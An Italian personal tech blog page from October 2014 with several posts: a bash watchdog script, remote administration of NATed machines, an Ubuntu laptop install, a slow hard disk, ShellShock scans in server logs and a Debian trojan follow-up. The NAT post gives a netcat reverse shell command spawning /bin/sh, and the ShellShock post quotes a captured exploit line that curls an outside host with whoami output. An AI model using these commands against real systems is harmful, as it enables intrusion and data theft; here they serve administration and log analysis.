mercoledì 15 ottobre 2014

Script Bash per riavviare un programma

Un problema che si e' posto recentemente e' quello di un programma che gestisce l'acquisione di un sensore si blocca in modo casuale con un messaggio nel log di connection reset by peer

Essendo un software commerciale la consultazione su internet non ha portato risultati e cosi' e'stato provato di scrivere un piccolo programmino in bash da mandare in background che controlla l'attivita' del programma e nel caso lo riavvia

Purtroppo quando il programma entra in errore di fatto non crasha ma rimane attivo in memoria senza fare niente, come in stallo, per cui mediante il comando ps non e' possibile verificare il suo stato di funzionamento
E' stato notato pero' che il file di log si blocca nel momento in cui il programma entra in stallo per cui lo script bash controlla la dimensione del file ad intervalli prefissati, nel caso le dimensioni del file di log non mutino si killa il processo e lo si riavvia

(in giallo le parti da personalizzare)
-----------------------------------------------------------------------------
#!/bin/bash
prima=0 #lunghezza file di log prima
dopo=0 #lunghezza file di log dopo
while true; do #ciclo infinito
dopo=$(stat -c%s "dati.log") #inserire qui il nome del file di log
if (($dopo==$prima)); #se prima e dopo l'intervallo la lunghezza e' uguale
then
echo "Non Cambiato" #effettua il kill del processo e lo riavvia
kill -9 $(pidof nome_programma) #mettere come parametro di pidoff il nome del programma da killare
nome_programma #mettere qui il nome del programma da far ripartire
fi

prima=$dopo #scambia il valore delle variabili per il prossimo ciclo
sleep 30 #intervallo di scansione del file di log
done
-----------------------------------------------------------------------------

martedì 14 ottobre 2014

Amministrare macchine sotto NAT

In alcuni casi puo' risultare necessario amministrare macchine che risultano dietro un router che fa NAT e quindi non hanno un indirizzo pubblico (ne' statico ne' dinamico) ma solo un indirizzo privato (si presentano su Internet con il solo indirizzo del router)

Un trucco puo' essere quello di configurare il router per fare port forwarding verso il client interno ma su alcuni reti (vedi quelle della telefonia mobile o Fastweb) cio' non e' possibile

In questi casi si puo' procedere con due metodi usando in entrambi i casi una reverse shell in cui la connessione e' iniziata dalla macchina nattata (questo permette di attraversare tranquillamente il router/firewall poiche' di solito le connessioni sono praticamente sempre filtrate solo dall'esterno verso l'interno)

Netcat
Su una macchina con indirizzo pubblico si digita (ovviamente non ci devono essere gia' server che sfruttano la porta 8080)
netcat -lvp 8080a questo punto dalla macchina nattata si digita
netcat -e /bin/sh ip_esterno 8080
a questo punto digitando i comandi sulla shell della macchina con ip pubblico si riescono ad eseguire i comandi sulla macchina nattata

SSH 
Supponiamo di avere una macchina con indirizzo pubblico su cui gira un server SSH ed un account su questa macchina (
Dalla macchina nattata si puo' digitare
ssh -R 8080:localhost:22 nome@ip_esterno

dalla macchina con ip pubblico si digita dove l'utente e la corrispettiva password sono quelle della macchina nattata
ssh utente1@localhost -p 8080

a questo punto i comandi digitati sulla macchina con ip pubblico vengono sulla macchina nattata

In tutto cio' c'e' un problema. Per effettuare il collegamento si deve interagire prima con la macchina nattata per poter aprire la connessione. Ma come si fa se questa e' irraggiungibile?? La soluzione, escludendo l'intervento umano di un collega sul posto, puo' essere quello di uno script in cron che lanci il comando a determinati intervalli. Se l'altro capo della comunicazione non e' pronto semplicemente la connessione viene interrotta, altrimenti inizia l'amministrazione remota

Ubuntu su Satellite NB10-A-102

Un amico mi ha passato il portatile in oggetto, un portatile Toshiba Satellite NB10-A-102 PU141E, per installare Ubuntu



Il computer ha un costo decisamente ridotto (tra 220 e 250 euro) ed ha uno schermo da 11.6 con scheda grafica integrata Intel. Le impressioni di uso sono abbastanza pessime perche' i tasti sono decisamente piccoli ed hanno una corsa ridicola (basta sfiorarli per trovarsi a cliccare)



Il fatto che il mio amico mi chiedesse di installare la macchina era sospetto perche' usa normalmente Linux e non e' esattamente uno sprovveduto in questo campo. Secondo quanto descritto, aveva gia' installato una 14.04 ma al riavvio ma la macchina non faceva salire il sistema operativo (primo sospettato EFI boot)

Non avendo drive ottico ho preparato una chiavetta USB con l'ultima iso di Ubuntu e mi sono trovato a fronteggiare una serie di errori:

in alcuni casi la chiavetta non veniva riconosciuta al boot e non trovando supporti disponibili la macchina si piantava alla partenza
in altri casi la chiavetta era riconosciuta ma dava una serie di errori irreversibile cercando di montare l'immagine live dell'installer


dopo aver creato una decina di chiavette ho chiaramente visto che non era il supporto corrotto ma c'era qualcosa nel bios che non andava. Frugando su internet viene consigliato di usare le porte USB di destra per inserire i dispositivi Usb di boot (??? Strano consiglio, ma a quel punto inizio a ruotare su tutte le porte per vedere se ho successo e finalmente mi si avvia il live cd ...ovviamente usando la porta Usb di sinistra)
Installo il sistema fino al termine in modo corretto (un po' lentamente a dire la verita'). Shutdown. Power On e la macchina si pianta al boot non riconoscendo il boot da disco fisso

Finalmente capito su questo post che indica come ci sia una incompatibilita' tra i file che installa Ubuntu ed il bios Efi di Toshiba. In pratica il bios si aspetta di trovare una directory /efi/boot ma trova il suo posto /efi/ubuntu ovviamente andando nei pazzi. Inoltre bisogna copiare il file  BOOTx64.EFI nella /efi/boot

Per fare cio' si deve riavviare la macchina dall'usb (se ci si riesce, e' piu' questione di fortuna che di capacita') e copiare a mano i file dal supporto live verso l'hdd come descritto nel post

A questo punto dopo due ore di lavoro la macchina e' pronta per l'utilizzo con praticamente tutte le periferiche riconosciute.

Debian??ci ho provato ma non mi ha avviato X (non riconoscendomi nemmeno il touchpad in fase di installazione) ed il mio amico aveva espressamente richiesto Ubuntu  per cui ho desistito subito

Quanto e' grande un MacBook??


Mi e' capitato di vedere un MacBook (Core DueDuo) ridotto ai minimi termini e sono rimasto stupefatto
Nella foto si puo' vedere la motherboard a fianco di una comune penna per riferimento


Per la cronaca il riflesso del flash e' sul touchpad, quella arrotolata sulla sinistra e' la matrice della tastiera, in alto lo speaker ed il disco SSD


mercoledì 8 ottobre 2014

WD10EADS

Un amico mi ha passato un disco WD Caviar Green della serie WD10EADS che era inserito dentro un mediacenter Mediacom
Il motivo della donazione e' che tramite Windows XP non riusciva piu' ad interagire con il disco mentre io con una prova fatta tramite Linux ero riuscito a copiare i dati (del tipo "tienilo te almeno ti serve a qualcosa")


Vista la dimensione generosa del disco ho deciso che valeva la pena di comprare un box SATA 3.5" per farlo diventare un disco di backup esterno.
Con sorpresa ho verificato che il disco e' sostanzialmente integro (nel senso che si puo' formattare in vari formati, si possono copiare dati e si possono rileggere) ma ha una velocita' decisamente ridicola (giusto per esempio per la lettura di un file video da circa 1 Gb sono stati necessari 7-8 minuti per una velocita' di circa 400 Kb/s (in alcuni casi ho misurato velocita' inferiori ai 200 Kb/s)



Con ricerca su internet di brevissima durata sono incappato in questo post che descrive esattamente le problematiche osservate

In conclusione il disco e' stato messo da parte in attesa di smaltimento

lunedì 6 ottobre 2014

ShellShock Scanning

Come prevedibile si cominciano a vedere passare nei log dei server i tentativi di utilizzare la vulnerabilita' di Bash ShellShock

Ecco come si presenta un tentativo di exploit
(la riga xxxxxx.org indica il nome del server che e' sottoposto ad attacco)

xx.xxx.xx.xxx - - [05/Oct/2014:11:53:00 +0200] "GET / HTTP/1.1" 200 88868 "-" "() { :;}; /bin/bash -c \"curl http://ntontomou.com/custom/ping.php?domain=xxxxxxxxxx.org\\&whoami=`whoami`\""

in pratica si tratta di una enumerazione piu' che di un attacco. Lo script controlla se la macchina e' vulnerabile a ShellShock ed in caso positivo si collega al sito ntontomou.com aggiornando la pagina ping.php per creare un elenco
La cosa interessante e' che oltre al nome del dominio viene passato anche il risultato del comando whoami credo per mostrare con che utente viene gestito il webserver (tipo www-data)

Cercando tracce di ShellShock ho trovato anche questa richiesta

xx.xxxx.xxx.xxx - - [29/Sep/2014:11:53:39 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 519 "-" "-"

da una ricerca non si tratta di una scansione ShellShock ma si cerca di sfruttare una vulnerabilita' di router Cisco o Linksys (peccato che le macchine scansionate siano tutte Linux)

venerdì 3 ottobre 2014

Trojan (cinese?) su server Debian 2

Qualche giorno fa avevo segnalato la presenza di un file sospetto su un server Debian ma non avevo trovato notizie su Internet

A seguito del post sono stato contattato da persone legate a Virustotal.com che mi chiedevano di condividere il file per una analisi (sicuramente piu' dettagliata di quella che avevo fatto io)
Dopo aver fatto qualche verifica che non stavo mandando il programma a male intenzionati ho effettuato l'upload e sono stato autorizzato a pubblicare una sintesi (non il dettaglio) dello scambio di mail che abbiamo avuto

1: avevo intuito bene e mi e' stato confermato che il file da me segnalato era malware peraltro non ancora segnalato su Virustotal

2: il programma aveva un compagno di un rootkit posizionato in /proc/rs_dev. Putroppo il server nel frattempo e' stato formattato e non ho piu' posssibilita' di esaminare il file richiesto

3: il componente sembra legato alla famiglia citata in questo post.(mi ricordo che vecchi tempi in cui i virus sotto Ms-Dos  usavano una tecnica simile)



Debugger integrato ESP32S3

Aggiornamento In realta' il Jtag USB funziona anche sui moduli cinesi Il problema risiede  nell'ID USB della porta Jtag. Nel modulo...